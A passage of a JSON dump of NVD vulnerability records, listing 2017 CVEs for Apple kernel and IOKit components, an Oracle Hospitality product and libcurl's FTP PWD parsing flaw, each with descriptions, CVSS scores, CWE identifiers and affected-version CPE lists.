"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-13868", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "cpe23": []}, {"lastseen": "2022-03-23T13:22:08", "description": "An issue was discovered in certain Apple products. iOS before 11.2 is affected. macOS before 10.13.2 is affected. The issue involves the \"IOKit\" component. It allows attackers to execute arbitrary code in a privileged context or cause a denial of service (memory corruption) via a crafted app.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-12-25T21:29:00", "type": "cve", "title": "CVE-2017-13847", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-13847"], "modified": "2017-12-28T16:38:00", "cpe": [], "id": "CVE-2017-13847", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-13847", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": []}, {"lastseen": "2022-03-23T13:22:56", "description": "An issue was discovered in certain Apple products. iOS before 11.2 is affected. macOS before 10.13.2 is affected. tvOS before 11.2 is affected. watchOS before 4.2 is affected. The issue involves the \"Kernel\" component. It allows attackers to bypass intended memory-read restrictions via a crafted app that triggers type confusion.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.5, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2017-12-25T21:29:00", "type": "cve", "title": "CVE-2017-13855", "cwe": ["CWE-704"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-13855"], "modified": "2019-03-08T16:06:00", "cpe": [], "id": "CVE-2017-13855", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-13855", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "cpe23": []}, {"lastseen": "2022-03-23T18:33:56", "description": "An issue was discovered in certain Apple products. macOS before 10.13.2 is affected. The issue involves the \"Kernel\" component. It allows attackers to bypass intended memory-read restrictions via a crafted app.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.5, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2018-04-03T06:29:00", "type": "cve", "title": "CVE-2017-7173", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-7173"], "modified": "2018-04-27T17:22:00", "cpe": [], "id": "CVE-2017-7173", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-7173", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "cpe23": []}, {"lastseen": "2022-03-23T13:21:33", "description": "An issue was discovered in certain Apple products. macOS before 10.13.1 is affected. The issue involves the \"CFNetwork\" component. It allows attackers to execute arbitrary code in a privileged context or cause a denial of service (memory corruption) via a crafted app.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-11-13T03:29:00", "type": "cve", "title": "CVE-2017-13833", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-13833"], "modified": "2019-04-29T16:31:00", "cpe": ["cpe:/o:apple:mac_os_x:10.13.0"], "id": "CVE-2017-13833", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-13833", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:apple:mac_os_x:10.13.0:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T13:23:37", "description": "An issue was discovered in certain Apple products. iOS before 11.2 is affected. macOS before 10.13.2 is affected. tvOS before 11.2 is affected. watchOS before 4.2 is affected. The issue involves the \"Kernel\" component. It allows attackers to bypass intended memory-read restrictions via a crafted app.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.5, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2017-12-25T21:29:00", "type": "cve", "title": "CVE-2017-13869", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-13869"], "modified": "2019-03-08T16:06:00", "cpe": [], "id": "CVE-2017-13869", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-13869", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "cpe23": []}, {"lastseen": "2022-03-23T13:24:30", "description": "An issue was discovered in certain Apple products. iOS before 11.2 is affected. macOS before 10.13.2 is affected. tvOS before 11.2 is affected. watchOS before 4.2 is affected. The issue involves the \"Kernel\" component. It allows attackers to execute arbitrary code in a privileged context or cause a denial of service (memory corruption) via a crafted app.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2018-04-03T06:29:00", "type": "cve", "title": "CVE-2017-13904", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-13904"], "modified": "2019-03-08T16:06:00", "cpe": [], "id": "CVE-2017-13904", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-13904", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": []}, {"lastseen": "2022-03-23T18:33:55", "description": "An issue was discovered in certain Apple products. iOS before 11.2 is affected. macOS before 10.13.2 is affected. iCloud before 7.2 on Windows is affected. iTunes before 12.7.2 on Windows is affected. tvOS before 11.2 is affected. watchOS before 4.2 is affected. The issue involves the \"CFNetwork Session\" component. It allows attackers to execute arbitrary code in a privileged context or cause a denial of service (memory corruption) via a crafted app.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2018-04-03T06:29:00", "type": "cve", "title": "CVE-2017-7172", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-7172"], "modified": "2019-03-08T16:06:00", "cpe": [], "id": "CVE-2017-7172", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-7172", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": []}, {"lastseen": "2022-03-23T13:23:28", "description": "An issue was discovered in certain Apple products. iOS before 11.2 is affected. macOS before 10.13.2 is affected. tvOS before 11.2 is affected. watchOS before 4.2 is affected. The issue involves the \"Kernel\" component. It allows attackers to execute arbitrary code in a privileged context or cause a denial of service (memory corruption) via a crafted app.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-12-25T21:29:00", "type": "cve", "title": "CVE-2017-13867", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-13867"], "modified": "2019-03-08T16:06:00", "cpe": [], "id": "CVE-2017-13867", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-13867", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": []}, {"lastseen": "2022-03-23T18:33:50", "description": "An issue was discovered in certain Apple products. iOS before 11.2 is affected. macOS before 10.13.2 is affected. tvOS before 11.2 is affected. watchOS before 4.2 is affected. The issue involves the \"IOKit\" component. It allows attackers to execute arbitrary code in a privileged context or cause a denial of service (memory corruption) via a crafted app.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-12-27T17:08:00", "type": "cve", "title": "CVE-2017-7162", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-7162"], "modified": "2019-03-08T16:06:00", "cpe": [], "id": "CVE-2017-7162", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-7162", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": []}, {"lastseen": "2022-03-23T18:33:48", "description": "An issue was discovered in certain Apple products. macOS before 10.13.2 is affected. The issue involves the \"IOAcceleratorFamily\" component. It allows attackers to execute arbitrary code in a privileged context or cause a denial of service (memory corruption) via a crafted app.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-12-27T17:08:00", "type": "cve", "title": "CVE-2017-7159", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-7159"], "modified": "2017-12-29T14:18:00", "cpe": [], "id": "CVE-2017-7159", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-7159", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": []}, {"lastseen": "2022-03-23T12:08:23", "description": "Vulnerability in the Oracle Hospitality Inventory Management component of Oracle Hospitality Applications (subcomponent: Settings and Config). Supported versions that are affected are 8.5.1 and 9.0.0. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Hospitality Inventory Management. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Hospitality Inventory Management accessible data as well as unauthorized read access to a subset of Oracle Hospitality Inventory Management accessible data. CVSS 3.0 Base Score 5.4 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N).", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "LOW", "baseScore": 5.4, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 2.5}, "published": "2017-08-08T15:29:00", "type": "cve", "title": "CVE-2017-10002", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-10002"], "modified": "2019-10-03T00:03:00", "cpe": ["cpe:/a:oracle:hospitality_inventory_management:9.0.0", "cpe:/a:oracle:hospitality_inventory_management:8.5.1"], "id": "CVE-2017-10002", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-10002", "cvss": {"score": 5.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:N"}, "cpe23": ["cpe:2.3:a:oracle:hospitality_inventory_management:9.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:hospitality_inventory_management:8.5.1:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T18:33:44", "description": "An issue was discovered in certain Apple products. iOS before 11.2 is affected. macOS before 10.13.2 is affected. tvOS before 11.2 is affected. The issue involves the \"Kernel\" component. It allows local users to bypass intended memory-read restrictions or cause a denial of service (system crash).", "cvss3": {"exploitabilityScore": 1.3, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 6.6, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.2}, "published": "2017-12-27T17:08:00", "type": "cve", "title": "CVE-2017-7154", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 5.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 7.8, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-7154"], "modified": "2019-03-22T19:37:00", "cpe": [], "id": "CVE-2017-7154", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-7154", "cvss": {"score": 5.6, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:C"}, "cpe23": []}, {"lastseen": "2022-03-23T12:09:25", "description": "libcurl may read outside of a heap allocated buffer when doing FTP. When libcurl connects to an FTP server and successfully logs in (anonymous or not), it asks the server for the current directory with the `PWD` command. The server then responds with a 257 response containing the path, inside double quotes. The returned path name is then kept by libcurl for subsequent uses. Due to a flaw in the string parser for this directory name, a directory name passed like this but without a closing double quote would lead to libcurl not adding a trailing NUL byte to the buffer holding the name. When libcurl would then later access the string, it could read beyond the allocated heap buffer and crash or wrongly access data beyond the buffer, thinking it was part of the path. A malicious server could abuse this fact and effectively prevent libcurl-based clients to work with it - the PWD command is always issued on new FTP connections and the mistake has a high chance of causing a segfault. The simple fact that this has issue remained undiscovered for this long could suggest that malformed PWD responses are rare in benign servers. We are not aware of any exploit of this flaw. This bug was introduced in commit [415d2e7cb7](https://github.com/curl/curl/commit/415d2e7cb7), March 2005. In libcurl version 7.56.0, the parser always zero terminates the string but also rejects it if not terminated properly with a final double quote.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2017-10-06T13:29:00", "type": "cve", "title": "CVE-2017-1000254", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-1000254"], "modified": "2021-06-29T15:15:00", "cpe": ["cpe:/a:haxx:libcurl:7.31.0", "cpe:/a:haxx:libcurl:7.19.1", "cpe:/a:haxx:libcurl:7.21.3", "cpe:/a:haxx:libcurl:7.12.0", "cpe:/a:haxx:libcurl:7.9.5", "cpe:/a:haxx:libcurl:7.28.0", "cpe:/a:haxx:libcurl:7.23.0", "cpe:/a:haxx:libcurl:7.45.0", "cpe:/a:haxx:libcurl:7.15.4", "cpe:/a:haxx:libcurl:7.18.1", "cpe:/a:haxx:libcurl:7.34.0", "cpe:/a:haxx:libcurl:7.10.6", "cpe:/a:haxx:libcurl:7.10.2", "cpe:/a:haxx:libcurl:7.16.0", "cpe:/a:haxx:libcurl:7.15.5", "cpe:/a:haxx:libcurl:7.29.0", "cpe:/a:haxx:libcurl:7.21.5", "cpe:/a:haxx:libcurl:7.40.0", "cpe:/a:haxx:libcurl:7.26.0", "cpe:/a:haxx:libcurl:7.16.2", "cpe:/a:haxx:libcurl:7.10", "cpe:/a:haxx:libcurl:7.42.0", "cpe:/a:haxx:libcurl:7.19.7", "cpe:/a:haxx:libcurl:7.50.2", "cpe:/a:haxx:libcurl:7.15.0", "cpe:/a:haxx:libcurl:7.48.0", "cpe:/a:haxx:libcurl:7.10.8", "cpe:/a:haxx:libcurl:7.53.0", "cpe:/a:haxx:libcurl:7.18.2", "cpe:/a:haxx:libcurl:7.25.0", "cpe:/a:haxx:libcurl:7.19.2", "cpe:/a:haxx:libcurl:7.11.1", "cpe:/a:haxx:libcurl:7.51.0", "cpe:/a:haxx:libcurl:7.16.4", "cpe:/a:haxx:libcurl:7.39", "cpe:/a:haxx:libcurl:7.9.8", "cpe:/a:haxx:libcurl:7.47.1", "cpe:/a:haxx:libcurl:7.28.1", "cpe:/a:haxx:libcurl:7.17.1", "cpe:/a:haxx:libcurl:7.27.0", "cpe:/a:haxx:libcurl:7.9.6", "cpe:/a:haxx:libcurl:7.8.1", "cpe:/a:haxx:libcurl:7.20.1", "cpe:/a:haxx:libcurl:7.15.1", "cpe:/a:haxx:libcurl:7.50.0", "cpe:/a:haxx:libcurl:7.49.0", "cpe:/a:haxx:libcurl:7.15.3", "cpe:/a:haxx:libcurl:7.10.1", "cpe:/a:haxx:libcurl:7.38.0", "cpe:/a:haxx:libcurl:7.37.0", "cpe:/a:haxx:libcurl:7.13.1", "cpe:/a:haxx:libcurl:7.24.0", "cpe:/a:haxx:libcurl:7.19.3", "cpe:/a:haxx:libcurl:7.30.0", "cpe:/a:haxx:libcurl:7.19.6", "cpe:/a:haxx:libcurl:7.37.1", "cpe:/a:haxx:libcurl:7.52.1", "cpe:/a:haxx:libcurl:7.21.4", "cpe:/a:haxx:libcurl:7.10.4", "cpe:/a:haxx:libcurl:7.55.1", "cpe:/a:haxx:libcurl:7.41.0", "cpe:/a:haxx:libcurl:7.21.2", "cpe:/a:haxx:libcurl:7.16.1", "cpe:/a:haxx:libcurl:7.21.6", "cpe:/a:haxx:libcurl:7.14.0", "cpe:/a:haxx:libcurl:7.23.1", "cpe:/a:haxx:libcurl:7.21.0", "cpe:/a:haxx:libcurl:7.9.1", "cpe:/a:haxx:libcurl:7.8", "cpe:/a:haxx:libcurl:7.32.0", "cpe:/a:haxx:libcurl:7.21.1", "cpe:/a:haxx:libcurl:7.11.2", "cpe:/a:haxx:libcurl:7.35.0", "cpe:/a:haxx:libcurl:7.12.1", "cpe:/a:haxx:libcurl:7.7", "cpe:/a:haxx:libcurl:7.53.1", "cpe:/a:haxx:libcurl:7.9.2", "cpe:/a:haxx:libcurl:7.19.5", "cpe:/a:haxx:libcurl:7.14.1", "cpe:/a:haxx:libcurl:7.43.0", "cpe:/a:haxx:libcurl:7.9.7", "cpe:/a:haxx:libcurl:7.17.0", "cpe:/a:haxx:libcurl:7.12.2", "cpe:/a:haxx:libcurl:7.11.0", "cpe:/a:haxx:libcurl:7.54.1", "cpe:/a:haxx:libcurl:7.15.2", "cpe:/a:haxx:libcurl:7.44.0", "cpe:/a:haxx:libcurl:7.22.0", "cpe:/a:haxx:libcurl:7.50.3", "cpe:/a:haxx:libcurl:7.9.3", "cpe:/a:haxx:libcurl:7.13.0", "cpe:/a:haxx:libcurl:7.18.0", "cpe:/a:haxx:libcurl:7.47.0", "cpe:/a:haxx:libcurl:7.42.1", "cpe:/a:haxx:libcurl:7.33.0", "cpe:/a:haxx:libcurl:7.49.1", "cpe:/a:haxx:libcurl:7.9", "cpe:/a:haxx:libcurl:7.46.0", "cpe:/a:haxx:libcurl:7.10.3", "cpe:/a:haxx:libcurl:7.54.0", "cpe:/a:haxx:libcurl:7.19.0", "cpe:/a:haxx:libcurl:7.50.1", "cpe:/a:haxx:libcurl:7.10.7", "cpe:/a:haxx:libcurl:7.19.4", "cpe:/a:haxx:libcurl:7.52.0", "cpe:/a:haxx:libcurl:7.7.2", "cpe:/a:haxx:libcurl:7.9.4", "cpe:/a:haxx:libcurl:7.7.1", "cpe:/a:haxx:libcurl:7.16.3", "cpe:/a:haxx:libcurl:7.10.5", "cpe:/a:haxx:libcurl:7.20.0", "cpe:/a:haxx:libcurl:7.55.0", "cpe:/a:haxx:libcurl:7.21.7", "cpe:/a:haxx:libcurl:7.7.3", "cpe:/a:haxx:libcurl:7.36.0", "cpe:/a:haxx:libcurl:7.13.2", "cpe:/a:haxx:libcurl:7.12.3"], "id": "CVE-2017-1000254", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-1000254", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:haxx:libcurl:7.35.0:*:*:*:*:*:*:*", "cpe:2.3:a:haxx:libcurl:7.30.0:*:*:*:*:*:*:*", "cpe:2.3:a:haxx:libcurl:7.10.5:*:*:*:*:*:*:*", "cpe:2.3:a:haxx:libcurl:7.15.0:*:*:*:*:*:*:*", "cpe:2.3:a:haxx:libcurl:7.21.0:*:*:*:*:*:*:*", "cpe:2.3:a:haxx:libcurl:7.12.3:*:*:*:*:*:*:*", "cpe:2.3:a:haxx:libcurl:7.51.0:*:*:*:*:*:*:*", "cpe:2.3:a:haxx:libcurl:7.19.2:*:*:*:*:*:*:*", 